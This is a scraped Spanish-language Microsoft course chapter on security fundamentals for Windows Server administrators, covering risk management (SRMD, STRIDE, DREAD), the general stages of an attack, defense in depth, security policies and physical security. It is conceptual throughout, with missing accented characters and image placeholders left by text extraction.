Está en la página 1de 67

UNDAMENTOS DE SEGURIDAD

1. Requisitos previos para el curso on-line

Experiencia prctica en la instalacin, configuracin, administracin y


planeamiento de la implementacin de Windows 2000 o Windows Server
2003
Experiencia con Active Directory

2. Panorama actual
2.1. El delito informtico est aumentando de frecuencia y de severidad:
Los meses recientes han considerado un claro aumento en ataques criminales
contra los sistemas informticos del mundo. La naturaleza del riesgo est
cambiando rpidamente y est llegando a ser ms y ms seria. Los hackers
criminales se estn sofisticando y la proliferacin de conexiones de banda ancha
de alta velocidad una cosa muy positiva en todos aspectos crea un
ambiente en el cual un virus o un gusano puede esparcirse increblemente
rpido y afectar a negocios y a consumidores ms rpidamente y
perceptiblemente que antes.
2.2. La tecnologa existe para los sistemas de proteccin pero la clave
est en la puesta en prctica:
Mientras que no hay software inmune a estos ataques criminales, las
computadoras se pueden instalar y mantener de manera de reducir al mnimo el
riesgo. Pero hasta la fecha ha sido demasiado difcil, complicado y desafiante
administrar las herramientas existentes de seguridad, muchas de las cuales,
cuando se implementan apropiadamente, son altamente eficaces en la
prevencin o la atenuacin del impacto en la computadora atacada.
2.3. Microsoft est tratando el problema de complejidad hoy y en el
futuro:
Reconocemos que Microsoft puede desempear un papel dominante en mejorar
la seguridad de la computadora: necesitamos continuar invirtiendo y entregando
un nivel ms alto de seguridad, necesitamos simplificar la seguridad y conducir
la inteligencia de las protecciones de seguridad ms profundas en nuestro
software para reducir las demandas en los usuarios y los administradores. Los
clientes nos dicen que esperan que nosotros hagamos ms y nosotros estamos
escuchando y trabajando de maneras mltiples para innovar y tratar el problema.

Los clientes nos han dicho que quieren que las herramientas, las
caractersticas y las configuraciones de seguridad sean ms fciles de
poner en prctica y ms simples de utilizar, y que las protecciones de
seguridad sean intrnsecas al software.
Durante este curso, hablaremos de cmo Microsoft est respondiendo a estas
demandas y al contorno de acciones que estamos llevando a cabo, integrando
tecnologas de seguridad.
Las acciones especficas incluirn:
Los procesos, las polticas y las tecnologas mejoradas de la
administracin de parches para ayudar a clientes a permanecer
actualizados y seguros.
El otorgamiento de una direccin mejor y las herramientas para asegurar
sistemas.
Actualizaciones a Microsoft Windows XP y Windows Server 2003 con
las nuevas tecnologas de seguridad ,que harn a Windows ms
resistente a los ataques, incluso si los parches todava no existen ni se
han instalado.
3. Definir Seguridad de Plataforma
Hay varias pautas, estndares y recomendaciones disponibles que pueden
ayudar a simplificar la tarea de asegurar su empresa. Miremos algunos de stos
detalladamente.
IT Infrastructure Library (ITIL) Definition
El gerenciamiento de la seguridad es responsable de la confidencialidad, la
integridad y la disponibilidad de datos asociados a un servicio. Un nmero de
security issues tienen que ser cubiertos por la administracin de disponibilidad:
-

Los servicios deben estar disponibles slo para el personal autorizado


Los datos deben estar disponibles solamente para el personal autorizado
y solamente en las horas convenidas
Los servicios deben ser recuperables dentro de los parmetros
convenidos de confidencialidad e integridad
Los servicios se deben disear y funcionar dentro de las polticas de
seguridad
Los contratistas deben tener acceso al hardware o al software

Nota: Para ms informacin, ir a http://www.itil.org/itil_e/itil_e_080.html

ISO 17799 (British Standard 7799)


De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

La informacin es la sangre de todas las organizaciones y puede existir en


muchas formas. Puede ser impresa o escrita en papel, almacenada
electrnicamente, transmitida por correo electrnico, mostrada en pelculas o
hablada en una conversacin. En el ambiente de negocio competitivo de hoy, tal
informacin est constantemente bajo amenaza de muchas fuentes. stas
pueden ser internas, externas, accidentales o maliciosas. Con el uso creciente
de la nueva tecnologa, al almacenar, transmitir y recuperar la informacin,
hemos abierto un gran nmero y tipo creciente de amenazas.
Hay una necesidad de establecer una poltica comprensiva de seguridad de la
informacin dentro de todas las organizaciones. Usted necesita asegurar la
confidencialidad, integridad y disponibilidad de la informacin corporativa vital y
de la informacin del cliente. El estndar para Information Security Management
System (ISMS) BS 7799, ya ha sido rpidamente establecido por los vendedores
de software ms grandes del mundo.
ISO 17799 (British Standard 7799) proporciona un acercamiento sistemtico
para administrar la informacin corporativa sensible. Proporciona los requisitos
para Information Security Management System. Security Management System
es un cdigo de prctica que incluye gente, procesos, y sistemas. ISO 17799
abarca de las diez secciones. Como ISO 17799 es un estndar, se recomienda
que ste sea repasado para el detalle en cada una de las 10 clasificaciones de
seguridad.
Nota: Para ms informacin, ir a:
http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter
Microsoft Operations Framework

Cap1-34.jpg
Microsoft Operations Framework (MOF) proporciona la direccin tcnica y la
ayuda de consulta que permite a organizaciones alcanzar confiabilidad,
disponibilidad, soportabilidad y flexibilidad en sistemas de misin critica de los
productos y tecnologas Microsoft.
MOF proporciona la direccin operacional en forma de white papers, guas de
operaciones, herramientas, las mejores prcticas, casos de estudio, plantillas,
herramientas de soporte y servicios. Estas guas estn dirigidas a gente,
procesos, tecnologa y administracin de issues complejos, ambientes IT
heterogneos y distribuidos.

4. Indice del presente captulo

Caso prctico
Disciplina de administracin de riesgos de seguridad
Defensa en profundidad
Respuesta a incidentes de seguridad
Ejemplos de ataques
Recomendaciones
Diez normas de seguridad inmutables

5. Caso prctico
Aqu se establecer el fundamento empresarial de la seguridad.
Especficamente, se tratar:

Las consecuencias de las infracciones de seguridad.


La encuesta de CSI/FBI de 2003.

5.1. Repercusin de las infracciones de seguridad

Cap1-01.jpg

Las infracciones de seguridad afectan a las organizaciones de diversas formas.


Con frecuencia, tienen los resultados siguientes:

Prdida de beneficios
Perjuicio de la reputacin de la organizacin
Prdida o compromiso de la seguridad de los datos
Interrupcin de los procesos empresariales
Deterioro de la confianza del cliente
Deterioro de la confianza del inversor
Consecuencias legales: en muchos estados o pases, la incapacidad de
proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes
Oxley, HIPAA, GLBA, California SB 1386.

Las infracciones de seguridad tienen efectos de gran repercusin.


Cuando existe una debilidad en la seguridad, ya sea real o slo una
percepcin, la organizacin debe emprender acciones inmediatas para
garantizar su eliminacin y que los daos queden restringidos.
Muchas organizaciones tienen ahora servicios expuestos a los clientes,
como los sitios Web. Los clientes pueden ser los primeros en observar el
resultado de un ataque. Por lo tanto, es esencial que la parte de una
compaa que se expone al cliente sea lo ms segura posible.

5.2. Encuesta de CSI/FBI de 2003

Cap1-02.jpg

El costo de la implementacin de medidas de seguridad no es trivial; sin


embargo, slo es una fraccin del costo que supone mitigar un incidente
de seguridad.
La encuesta ms reciente sobre seguridad y delitos informticos del
Instituto de seguridad de equipos y de la Oficina Federal de Investigacin
(CSI/FBI, Computer Security Institute/Federal Bureau of Investigation) de
Estados Unidos, incluye cifras interesantes relativas a las prdidas
financieras que suponen los ataques a equipos para las organizaciones
que los sufren.
La encuesta demuestra que los ataques de denegacin de servicio (DoS,
Denial Of Service) y de robo de informacin son los responsables de las
mayores prdidas.
En consecuencia, es importante saber que aunque el costo de la
implementacin de sistemas de proteccin de la seguridad no es trivial,

supone una fraccin del costo que conlleva mitigar los compromisos de la
seguridad.
La solucin de seguridad ms efectiva es la creacin de un entorno en
niveles de modo que se pueda aislar un posible ataque llevado a cabo en
uno de ellos. Un ataque tendra que poner en peligro varios niveles para
lograr su propsito. Esto se conoce como defensa en profundidad. Esta
estructura de seguridad se explicar detalladamente ms adelante en
esta presentacin.

6. Disciplina de administracin de riesgos de seguridad


En este captulo, se explicar la disciplina de administracin de riesgos de
seguridad (SRMD). Especficamente, se tratar:
Los tres procesos de SRMD son:
Evaluacin.
Desarrollo e implementacin.
Funcionamiento.
La evaluacin implica:
Evaluacin y valoracin de activos.
Identificacin de riesgos de seguridad con STRIDE.
Anlisis y asignacin de prioridad a los riesgos de seguridad con DREAD.
Seguimiento, planeamiento y programacin de actividades relacionadas
con los riesgos de seguridad.
El desarrollo e implementacin incluyen:
Desarrollo de mtodos correctivos de seguridad.
Prueba de los mtodos correctivos de seguridad.
Obtencin de informacin de seguridad.
El funcionamiento incluye
Volver a valorar los activos nuevos y los que han sufrido cambios, as
como los riesgos de seguridad.
Estabilizar e implementar medidas preventivas nuevas o que han
cambiado.

6.1. Procesos

Cap1-03.jpg
La disciplina de administracin de riesgos de seguridad (SRMD, Security Risk
Management Discipline) define los tres procesos principales que una
organizacin debe implementar para llegar a ser segura y continuar sindolo.
Los tres procesos son:

Evaluacin: esta fase implica la recopilacin de la informacin relevante


del entorno de la organizacin con el fin de realizar una estimacin de la
seguridad. Debe recopilar datos suficientes para analizar de forma
efectiva el estado actual del entorno. A continuacin, se debe determinar
si los activos de informacin de la organizacin estn bien protegidos de
posibles amenazas, y se debe crear un plan de accin de seguridad, que
se pone en prctica durante el proceso de implementacin.
Desarrollo e implementacin: esta fase se centra en la puesta en
marcha de un plan de accin de seguridad destinado a implementar los
cambios recomendados definidos en la fase de evaluacin. Adems, se
desarrolla un plan de contingencia de riesgos de seguridad.
Funcionamiento: durante esta fase, se debe modificar y realizar
actualizaciones en el entorno a medida que se necesiten para mantener
su seguridad. Durante los procesos operativos, se llevan a cabo
estrategias de pruebas de la penetracin y de respuesta a incidentes, que
ayudan a solidificar los objetivos de la implementacin de un proyecto de
seguridad en la organizacin. Asimismo, tambin se realizan actividades

de auditora y supervisin para mantener la infraestructura intacta y


segura.
En la gua de Microsoft Solutions para la proteccin de Windows 2000 Server
(Microsoft Solutions Guide for Securing Windows 2000 Server) en
www.microsoft.com, se encuentran detalles adicionales de SRMD.
7. Evaluacin: evaluar y valorar

Cap1-04.jpg

La evaluacin de activos determina el valor reconocido de la informacin


desde el punto de vista de quienes la utilizan y el trabajo que conlleva su
desarrollo. La evaluacin de activos tambin implica determinar el valor
de un servicio de red, por ejemplo, el de un servicio que proporciona a los
usuarios de la red acceso saliente a Internet, desde el punto de vista de
quienes utilizan dicho servicio y lo que costara volver a crearlo.
La valoracin determina cunto cuesta mantener un activo, lo que
costara si se perdiera o destruyera y qu beneficio lograran terceros si
obtuvieran esta informacin. El valor de un activo debe reflejar todos los
costos identificables que surgiran si el activo se viera perjudicado.
Al determinar las prioridades en relacin a los activos, se pueden emplear
valores arbitrarios, como los mostrados en la diapositiva, o valores
especficos, como el costo monetario real. Las organizaciones deben
utilizar la escala ms apropiada para resaltar el valor relativo de sus
activos.

7.1.

Cap1-05.jpg

La identificacin de los riesgos de seguridad permite a los miembros de


los grupos de trabajo del proyecto aclarar las ideas e identificar posibles
riesgos para la seguridad. La informacin se recopila en forma de
amenazas, vulnerabilidades, puntos dbiles y medidas preventivas. El
modelo STRIDE proporciona una estructura valiosa y fcil de recordar
para identificar las amenazas y los posibles puntos dbiles.
La suplantacin de identidades es la capacidad de obtener y usar la
informacin de autenticacin de otro usuario. Un ejemplo de suplantacin
de identidad es la utilizacin del nombre y la contrasea de otro usuario.
La alteracin de datos implica su modificacin. Un ejemplo sera alterar el
contenido del cookie de un cliente.
El repudio es la capacidad de negar que algo ha ocurrido. Un ejemplo de
repudio sera que un usuario cargue datos dainos en el sistema cuando
en ste no se puede realizar un seguimiento de la operacin.
La divulgacin de informacin implica la exposicin de informacin ante
usuarios que se supone que no deben disponer de ella. Un ejemplo de

divulgacin de informacin es la capacidad de un intruso para leer


archivos mdicos confidenciales a los que no se le ha otorgado acceso.
Los ataques de denegacin de servicio privan a los usuarios del servicio
normal. Un ejemplo de denegacin de servicio consistira en dejar un sitio
Web inaccesible al inundarlo con una cantidad masiva de solicitudes
HTTP.
La elevacin de privilegios es el proceso que siguen los intrusos para
realizar una funcin que no tienen derecho a efectuar. Para ello, puede
explotarse una debilidad del software o usar las credenciales de forma
ilegtima.

Otros ataques podran ser llevados a cabo nicamente con el propsito de que
el sistema de destino incurra en gastos. Por ejemplo, se podra montar un
ataque contra un servicio de fax o un telfono celular para hacer un gran nmero
de llamadas internacionales que supongan un gran costo.

7.2. Amenazas comunes


7.2.1. Quin puede atacar?

Cap1-28.jpg
Los atacantes de todas las capacidades y motivaciones son peligrosos a la
seguridad de la red interna, de diversas maneras:
Principiante. La mayora de los atacantes tienen solamente conocimiento bsico
de sistemas pero son inmviles y peligrosos porque no entienden a menudo
completamente las consecuencias de sus acciones.
Intermedio. Los atacantes con habilidades intermedias generalmente estn
intentando ganar respeto en comunidades de atacantes. Tpicamente, atacan
blancos prominentes y crean herramientas automatizadas para atacar otras
redes.

Avanzado. Los atacantes altamente expertos presentan un desafo serio a la


seguridad porque sus mtodos de ataque se pueden extender ms all de la
tecnologa en intrusin fsica e ingeniera social, o engao de un usuario o
administrador para ganar la informacin. Aunque hay relativamente pocos
atacantes avanzados, sus habilidades y la experiencia los hacen los atacantes
ms peligrosos a una red.
7.2.2. Vulnerabilidades

Cap1-29.jpg
Los ataques ms acertados contra redes tienen xito explotando el campo
comn y las vulnerabilidades o debilidades sabidas. Asegrese de entrenar a

administradores y reconocer estas vulnerabilidades para que lleguen a ser


familiares con nuevas vulnerabilidades cuando ellas se descubran.
7.2.3. Cmo ocurren los ataques?

Cap1-30.jpg
Los ataques contra redes siguen a menudo el mismo patrn. Mtodos de diseo
para detectar, responder o prevenir ataques durante cada una de las siguientes
etapas:
1. Ingreso. En esta etapa, el atacante investiga a la organizacin blanco. l
puede obtener toda la informacin pblica sobre una organizacin y sus

empleados y realizar exploraciones completas en todas las computadoras y


dispositivos que son accesibles desde Internet.
2. Penetracin. Despus de que el atacante haya localizado vulnerabilidades
potenciales, intenta aprovecharse de una de ellas. Por ejemplo, el atacante
explota un Servidor Web que carece de la actualizacin ltima de seguridad.
3. Elevacin del privilegio. Luego que el atacante ha penetrado con xito la red,
procura obtener los derechos a nivel sistema de Administrador. Por ejemplo,
mientras que explota el servidor Web, gana control de un proceso funcionando
bajo el contexto LocalSystem. Este proceso ser utilizado para crear una cuenta
administrador. En general, seguridad pobre como resultado de usar las
configuraciones por defecto, permite que un atacante obtenga el acceso de red
sin mucho esfuerzo.
4. Explotar. Despus de que el atacante haya obtenido las derechas necesarias,
l realiza la hazaa o mtodo de romper la red. Por ejemplo, el atacante elige
desfigurar el sitio pblico Web de la organizacin.
5. Cover-up. La etapa final de un ataque es donde un atacante procura ocultar
sus acciones para escapar a la deteccin o el procesamiento. Por ejemplo, un
atacante borra entradas relevantes en archivos log de la intervencin.

7.3.

Evaluacin: anlisis y establecimiento de prioridades de los


riesgos de seguridad: DREAD

DREAD
Dao
Capacidad de reproduccin
Capacidad de explotacin
Usuarios afectados
Capacidad de descubrimiento

Exposicin al riesgo = Prioridad del activo x Categora de la amenaza

El anlisis de riesgos de seguridad se utiliza para analizar los ataques,


herramientas, mtodos y tcnicas que podran usarse para explotar una
posible vulnerabilidad. El anlisis de riesgos de seguridad es un mtodo
para la identificacin de riesgos y la evaluacin del posible dao que
podra ocasionarse. El resultado de la evaluacin puede usarse para
justificar medidas de proteccin de la seguridad.
Un anlisis de riesgos de seguridad tiene tres objetivos principales:
identificar riesgos, cuantificar los efectos de las posibles amenazas y
proporcionar un equilibrio econmico entre la repercusin del riesgo y el
costo de la medida preventiva. La informacin se recopila para estimar el
grado de riesgo de modo que el grupo de trabajo pueda tomar decisiones
fundadas en relacin a qu riesgos de seguridad deben constituir el
objeto principal de las estrategias correctivas.

Este anlisis se usa entonces para asignar prioridad a los riesgos de


seguridad y permitir a la organizacin destinar los recursos para tratar los
problemas de seguridad ms importantes.
Una vez identificada una amenaza, debe clasificarse. Una solucin para
ello es usar DREAD. La clasificacin de 1 a 10 se asigna en cinco reas:
daos, capacidad de reproduccin, capacidad de explotacin, usuarios
afectados y capacidad de descubrimiento.
La clasificacin se realiza como promedio, con lo que ofrece una
categora global de amenazas. Cuanto mayor es la categora, ms grave
es la amenaza. Esta clasificacin proporciona una perspectiva de la
prioridad relativa de cada riesgo en vez de una cuantificacin real del
mismo. Para ello se pede tomar esta categora y multiplicarla por el grado
de imprescindibilidad de un sistema para conocer el riesgo que supone
para ste.

7.4. Elementos a proteger

Cap1-31.jpg
Adems de la proteccin fsica enumerada en la tabla, gran parte del papel de la
seguridad es proteger la confianza pblica y la confianza en socios de negocio.
En las prcticas generalmente aceptadas de la contabilidad (GAAP), este tipo de
activo se conoce como voluntad, que se puede poner en estados financieros
cuando venden a una compaa.
Considerar, por ejemplo, que un atacante atac el sitio Web de su organizacin.
Usted notifica a sus clientes que el atacante ha robado la informacin privada de

Usuarios del sitio Web, incluyendo sus direcciones y nmeros de tarjeta de


crdito. Adems de incurrir en prdidas financieras directas del negocio, su
organizacin tambin sufre una prdida de confianza porque se desdibuja la
imagen de la compaa.

7.5.

Cap1-06.jpg

8.

Las tareas de seguimiento, planeamiento y programacin de riesgos de


seguridad toman la informacin obtenida en el anlisis de riesgos de
seguridad y se utilizan para formular estrategias correctivas y de
contingencia, adems de los planes para abarcarlas.
La programacin de riesgos de seguridad intenta definir un programa para
las diversas estrategias correctivas, creadas durante la fase de generacin
de un proyecto de seguridad. Esta programacin tiene en consideracin la
forma en que los planes de seguridad se aprueban e incorporan a la
arquitectura de informacin, adems de los procedimientos de operaciones
diarias estndares que deben implementarse.

Cap1-07.jpg
El desarrollo de mtodos correctivos para los riesgos de seguridad es un
proceso en el que se toman los planes creados durante la fase de evaluacin y
se usan para elaborar una nueva estrategia de seguridad que implique la
administracin de la configuracin y las revisiones, la supervisin y auditora de
los sistemas, y la creacin de directivas y procedimientos operativos.
A medida que se desarrollan las diversas medidas preventivas, es importante
garantizar que se realice un seguimiento e informe minuciosos del progreso.
La prueba de las estrategias correctivas de los riesgos de seguridad tienen lugar
despus de su desarrollo, una vez realizados los cambios de administracin del
sistema asociados y escrito las directivas y procedimientos para determinar su
efectividad.
El proceso de prueba permite al grupo de trabajo considerar cmo se pueden
implementar dichos cambios en un entorno de produccin. Durante el proceso
de prueba, las medidas preventivas se evalan teniendo en cuenta la efectividad
con respecto a cmo se consigue controlar el riesgo de seguridad y a los efectos
indeseables que se observan en otras aplicaciones.

8.1.

Obtencin

Cap1-08.jpg
El conocimiento de los riesgos de seguridad permite formalizar el proceso para
recopilar la informacin sobre cmo el grupo de trabajo protegi los activos y
documenta las vulnerabilidades y puntos dbiles que se descubrieron. Cuando el
departamento de tecnologa de la informacin (IT, Information Technology)
rene nueva informacin relativa a la seguridad, dicha informacin se debe
capturar y volver a implementar para garantizar la mxima eficacia, continuada
de las medidas preventivas de seguridad que protegen los activos de la
organizacin. Adems, se debe implantar un programa de aprendizaje destinado
a los grupos empresariales. Este programa de aprendizaje puede tomar la forma
de cursos instructivos o de boletines diseados para adquirir conciencia de la
seguridad.
Una organizacin debe definir un proceso formal de administracin de riesgos
que determinar cmo se inician y evalan las medidas preventivas, y en qu
circunstancias se debe avanzar de un paso a otro en cada riesgo de seguridad o
conjunto de riesgos.

8.2.

Funcionamiento: reevaluacin de los activos y los riesgos

Cap1-09.jpg

Las organizaciones son dinmicas y su plan de seguridad tambin debe


serlo. Se debe actualizar la evaluacin de riesgos peridicamente. Asimismo,
valorar el plan de evaluacin de riesgos cada vez que se realice un cambio
importante en el funcionamiento o en la estructura. Es decir, si se efecta
una reorganizacin o se traslada a un edificio nuevo o se cambia de
proveedores o se activa un nuevo sitio Web o se realizan otros cambios
importantes, se deben volver a evaluar los riegos y las posibles prdidas
mediante los pasos descritos anteriormente en la fase de evaluacin.
Es importante evaluar los riesgos de forma continuada. Esto significa que
nunca se debe dejar de buscar nuevos riesgos ni de reevaluar
peridicamente los riesgos existentes. Si no se realiza alguna de estas
acciones, la administracin de riesgos no beneficiar a la organizacin. La
frecuencia con que se debe revisar el plan de administracin de riesgos y sus
activadores debe definirse en la directiva de seguridad de la organizacin.
La reevaluacin de activos y riesgos es esencialmente un proceso de
administracin de cambios, pero tambin se utiliza para realizar la
administracin de la configuracin de seguridad. Esto permite reducir el
trabajo administrativo cuando se han completado las medidas preventivas y
las directivas de seguridad.

8.3.

Funcionamiento: estabilizacin y desarrollo de medidas


preventivas

Cap1-10.jpg
En general, la Disciplina de Administracin de Riesgos de Seguridad se basa en
los siguientes componentes de la gua de ciclo de vida de tecnologa de la
informacin de Microsoft:

Disciplina de administracin de riesgos de Microsoft Solutions Framework


(MSF)
http://www.microsoft.com/technet/itsolutions/techguide/msf/msrmd11.mspx
(este sitio est en ingls)

Modelo de riesgo para operaciones de Microsoft Operations Framework


(MOF)
http://www.microsoft.com/technet/itsolutions/techguide/mof/mofrisk.mspx
(este sitio est en ingls)

La diapositiva muestra el modelo de riesgo para operaciones de MOF, que


describe los pasos del proceso de administracin de riesgos: identificar, analizar,
planear, rastrear y controlar. Se trata de un proceso continuado que implica la
evaluacin y el anlisis continuados de los riesgos de seguridad. En
consecuencia, ser necesario implementar continuamente nuevas medidas
preventivas o realizar cambios en las existentes, basndose en esta nueva
evaluacin.
Despus de la implementacin de las medidas preventivas nuevas o que han
cambiado, es importante mantener el proceso de las operaciones. Las tareas
que los administradores de seguridad o los administradores de redes tienen que
realizar pueden incluir:

Administracin del sistema


Mantenimiento de cuentas
Supervisin de servicios
Programacin de trabajos
Procedimientos de copia de seguridad

Estos procesos de implementacin de la estabilizacin y las medidas


preventivas corresponden a las fases de estabilizacin y desarrollo del modelo
de proceso MSF, que pueden encontrarse en
http://www.microsoft.com/technet/itsolutions/techguide/msf/msfpm31.mspx
(este sitio est en ingls).

9. Defensa en profundidad
En este tema, se expondr la defensa en profundidad. Especficamente, se
tratar:

Organizacin de una estructura para la seguridad: defensa en profundidad.


Cmo se puede ver comprometida la seguridad de cada nivel del modelo de
defensa en profundidad.
Cmo proporcionar proteccin para cada nivel del modelo de defensa en
profundidad.

Para reducir riesgo en un ambiente, se debe utilizar una estrategia de la


defensa-en-profundidad para proteger recursos contra amenazas externas e
internas. Defensa en profundidad (llamado a veces seguridad en profundidad o
seguridad de varias capas) se toma de un trmino militar usado para describir

las contramedidas de la seguridad para formar un ambiente cohesivo de


seguridad sin un solo punto de falla. Las capas de la seguridad que forman la
estrategia de defensa-en-profundidad deben incluir medidas protectoras que
implementen desde sus routers externos completamente a la localizacin de los
recursos y a todos los puntos entre ellos.
Por capas mltiples se implementa seguridad, y se debe ayudar a asegurar una
capa si se compromete la misma, Las otras capas proporcionarn la seguridad
necesaria para proteger los recursos. Por ejemplo, el compromiso del firewall de
una organizacin no debe proporcionar acceso del atacante a los datos ms
sensibles de la organizacin. Cada capa debe proporcionar idealmente diversas
formas de contramedidas para evitar que el mismo mtodo de ataque sea
utilizado en las diferentes capas.
Se debe invertir en una proteccin multi-vendor contra virus si es posible.
Tambin es necesario asegurarse de que la proteccin de virus est configurada
en diversos puntos como gateway, server, clientes etctera.

9.1.

Estructura de organizacin de la seguridad

Cap1-11.jpg

Para reducir al mnimo la posibilidad de que un ataque contra una


organizacin tenga xito, se debe utilizar el mayor nmero posible de niveles
de defensa.
Defender una organizacin en profundidad implica el uso de varios niveles de
defensa. Si un nivel se ve comprometido, ello no conlleva necesariamente
que tambin lo est toda la organizacin. Como directriz general, se debe
disear y crear cada nivel de la seguridad bajo el supuesto de que se ha
conseguido infringir la seguridad. Realizar los pasos necesarios para
proteger el nivel en el que se est trabajando.
Adems, hay muchas formas de proteger cada nivel individual mediante
herramientas, tecnologas, directivas y la aplicacin de las recomendaciones.
Por ejemplo:
Nivel de directivas, procedimientos y concienciacin: programas
educativos de seguridad para los usuarios
Nivel de seguridad fsica: guardias de seguridad, bloqueos y
dispositivos de seguimiento
Nivel perimetral: servidores de seguridad de hardware, software o
ambos, y creacin de redes privadas virtuales con procedimientos
de cuarentena
Nivel de red de Internet: segmentacin de red, Seguridad IP
(IPSec) y sistemas de deteccin de intrusos de red
Nivel de host: prcticas destinadas a reforzar los servidores y
clientes, herramientas de administracin de revisiones, mtodos
seguros de autenticacin y sistemas de deteccin de intrusos
basados en hosts.
Nivel de aplicacin: prcticas destinadas a reforzar las aplicaciones
y el software antivirus
Nivel de datos: listas de control de acceso (ACL) y cifrado

9.2.

Descripcin de las directivas, los procedimientos y el nivel de


concienciacin

Cap1-12.jpg

Generalmente, los usuarios no tienen en cuenta la seguridad cuando realizan


sus tareas diarias.
Una directiva de seguridad para una organizacin debe definir:
El uso aceptable.
El acceso remoto.
La proteccin de la informacin.
La copia de seguridad de los datos.
La seguridad del permetro.
La seguridad de los dispositivos y hosts bsicos.
Una directiva debe comunicar consenso y proporcionar el fundamento
para que el departamento de Recursos Humanos acte en el caso de que
se infrinja la seguridad. Tambin puede ayudar a demandar a quienes
logren infringir la seguridad.
Una directiva de seguridad debe proporcionar a la organizacin un
procedimiento de tratamiento de incidentes apropiado. Debe definir:
Las reas de responsabilidad.
El tipo de informacin que debe registrarse.
El destino de esa informacin.
Qu acciones emprender tras un incidente.

Una directiva de seguridad adecuada suele ser el fundamento del resto


de prcticas de seguridad. Cada directiva debe ser lo suficientemente
general para poder aplicarse en distintas tecnologas y plataformas. Al
mismo tiempo, debe ser lo suficientemente especfica para proporcionar a
los profesionales de IT orientacin sobre cmo implementar la directiva.
El mbito de la directiva de seguridad de una organizacin depende del
tamao y complejidad de sta. En muchas organizaciones hay consejos
disponibles sobre cmo crear directivas de seguridad, por ejemplo, en
http://www.sans.org/ y http://www.iss.net/ (estos sitios estn en ingls).

9.3.

Directivas, procedimientos y compromiso del nivel de


concienciacin

Los intrusos pueden usar estratagemas sociales para aprovecharse de los


usuarios que no son conscientes de los problemas de seguridad que pueden
surgir en su lugar de trabajo o que los desconocen. Para los usuarios, muchas
medidas de seguridad parecen innecesarias y, por lo tanto, no las siguen.
Muchos ataques implican el uso de estratagemas sociales. Ciertos artificios
sociales se aprovechan de la despreocupacin por la seguridad con que la
mayor parte de los usuarios actan en su vida diaria. Un intruso puede emplear
su tiempo de ocio o de trabajo en intentar conocer a los usuarios y ganarse su
confianza. Aunque un intruso formule preguntas aparentemente inofensivas, la
informacin que obtiene en conjunto le proporciona los medios para llevar a
cabo o iniciar un ataque.

9.4.

Directivas, procedimientos y proteccin del nivel de


concienciacin

Para contrarrestar estas amenazas de estratagemas sociales, las


organizaciones deben implementar procedimientos claros y precisos, y
procesos que deban cumplir todos los empleados, adems de entrenarlos
en el uso de estas directivas. Cada funcin que se desempee debe tener
instrucciones claras y documentadas.
Siempre se requieren programas de aprendizaje sobre seguridad para
detallar estos procesos y procedimientos. Las instrucciones deben formar
una imagen completa de la seguridad de modo que los usuarios
entiendan la necesidad de disponer de seguridad en todos los niveles y
en todas las ocasiones.
Una directiva de seguridad combina las necesidades de seguridad y la
cultura de una organizacin. Se ve afectada por el tamao de la
organizacin y sus objetivos. Algunas directivas pueden ser aplicables a

todos los sitios pero otras son especficas de ciertos entornos. Una
directiva de seguridad debe equilibrar la posibilidad de control con la
necesidad de productividad. Si las directivas son demasiado restrictivas,
los usuarios siempre encontrarn formas de omitir los controles. Una
organizacin debe demostrar un compromiso en la administracin con
respecto al grado de control definido en una directiva; de lo contrario, no
se implementar correctamente.

9.5.

Descripcin del nivel de seguridad fsica

Cap1-13.jpg

Un intruso con acceso a los componentes fsicos puede omitir fcilmente


muchos procedimientos de seguridad.
Un intruso puede utilizar el telfono de una compaa o un dispositivo de
mano. Acciones como ver las listas de contactos o nmeros de telfono,
enviar un mensaje de correo electrnico o responder al telfono
identificndose como su propietario, pueden facilitar al intruso la
consecucin de su objetivo.
Los equipos porttiles de una compaa pueden contener abundante
informacin muy til para un intruso. Es por ello que siempre deben
almacenarse de un modo seguro cuando no se estn usando.

9.6.

Compromiso del nivel de seguridad fsica

Cap1-14.jpg

Si los intrusos obtienen acceso fsico a los sistemas, pasan a convertirse


en efecto en sus propietarios.
En algunos casos, un ataque slo es un acto vandlico. Deshabilitar un
sistema puede constituir un problema importante, pero no es menos serio
que el hecho de que un intruso pueda ver, cambiar o eliminar datos que
se piensa que son seguros.
El acceso fsico a un sistema tambin permite a un intruso instalar
software. El software puede pasar desapercibido y ejecutarse en un
sistema durante un perodo considerable, durante el que consigue
recopilar datos esenciales de la compaa. Esto puede resultar
desastroso.

9.7.

Proteccin en el nivel de seguridad fsica

Se puede utilizar una amplia variedad de tcnicas para proteger una


instalacin. El grado de seguridad fsica disponible depende del
presupuesto. Es fcil mantener estndares elevados cuando se trabaja
con un modelo hipottico. Sin embargo, en el mundo real, las soluciones
deben idearse en funcin del sitio, los edificios y las medidas de
seguridad empleadas. La lista de la diapositiva presenta algunas de las
maneras en que puede proteger una instalacin.
La defensa en profundidad comienza por aplicar una seguridad fsica a
todos los componentes de la infraestructura. Si algn individuo no
autorizado tiene acceso fsico al entorno, ste no se puede considerar
seguro. Por ejemplo, un tcnico de mantenimiento podra cambiar un
disco con errores en una matriz RAID1 que contenga datos de clientes.
Es posible que el disco se pueda reparar. Los datos estn ahora en
manos de un tercero.
El primer paso es separar los servidores de los operadores humanos y los
usuarios. Todas las salas de servidores deben estar cerradas con llave. El
acceso a las salas de servidores debe estar controlado y registrado
estrictamente. Algunos de los mecanismos de control de acceso que
pueden aplicarse incluyen el uso de placas de identificacin y sistemas
biomtricos. Un empleado de confianza debe organizar de antemano el
acceso y autorizarlo. Si no existen salas especiales para los servidores,
stos se deben proteger en cabinas o, al menos, cerrarse bajo llave en
los armarios. La mayor parte de los armarios de servidores se puede abrir
con una llave estndar de modo que no debe confiar nicamente en las
cerraduras que vengan de fbrica.
Todas las salas de servidores deben disponer de algn tipo de
mecanismo contra incendios: los incendios provocados constituyen una
amenaza que requiere una medida preventiva.
El acceso debe ser supervisado por guardias de seguridad o mediante un
circuito cerrado de televisin (CCTV). Las grabaciones de vdeo de CCTV
se pueden usar con fines de auditora y la presencia de cmaras puede
servir para prevenir accesos oportunistas. Tenga en cuenta que en la
mayor parte de las ocasiones, quienes consiguen infringir la seguridad
son individuos que curiosean sin malas intenciones, no piratas
informticos especializados que persiguen un fin daino.
